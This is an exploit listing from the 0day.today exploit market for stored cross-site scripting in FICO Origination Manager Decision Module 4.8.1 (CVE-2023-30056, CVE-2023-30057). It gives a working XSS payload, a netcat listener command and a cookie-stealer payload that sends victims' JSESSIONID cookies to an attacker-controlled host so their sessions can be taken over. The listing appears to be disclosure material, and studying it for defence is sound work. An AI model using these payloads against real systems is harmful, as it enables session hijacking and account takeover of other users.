[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FICO Origination Manager Decision Module 4.8.1 XSS / Session Hijacking Vulnerabilities

Author
Matei Josephs
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38673
Category
web applications
Date add
09-05-2023
CVE
CVE-2023-30056
CVE-2023-30057
Platform
php
# Exploit Title: Stored-XSS in FICO Origination Manager Decision Module 4.8.1 Leads to Session Hijacking
# Exploit Author: Matei Josephs
# Vendor Homepage: https://www.fico.com/
# Version: FICO Origination Manager Decision Module 4.8.1
# CVE : CVE-2023-30056, CVE-2023-30057

Introduction
=================
Multiple stored cross-site scripting (XSS) vulnerabilities in FICO Origination Manager Decision Module 4.8.1 allow to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.

Proof of Concept
=================
All description fields when adding Categories and Products, Product Strategies, Decision Flows, Data Object References, Data Methods, Data Method Sequences, Rulesets, Decision Tables, Decision Trees, Score Models, Scenarios, or Internal Services are vulnerable to a stored XSS using the following payload: 
  <img/src/onerror=prompt(document.cookie)>

An attacker could implement a cookie stealer as follows:
  On the attacker's machine:
    nc -lvnp <PORT>
  In one of the vulnerable description fields:
    <img/src/onerror=fetch('http://<ATTACKER-IP>:<PORT>/'+document.cookie)>

When a victim would visit the page where the payload was injected, the attacker would receive their JSESSIONID cookie. The attacker could then use the JSESSIONID cookie to log into the Origination Manager Decision Module as the victim.

#  0day.today [2024-12-24]  #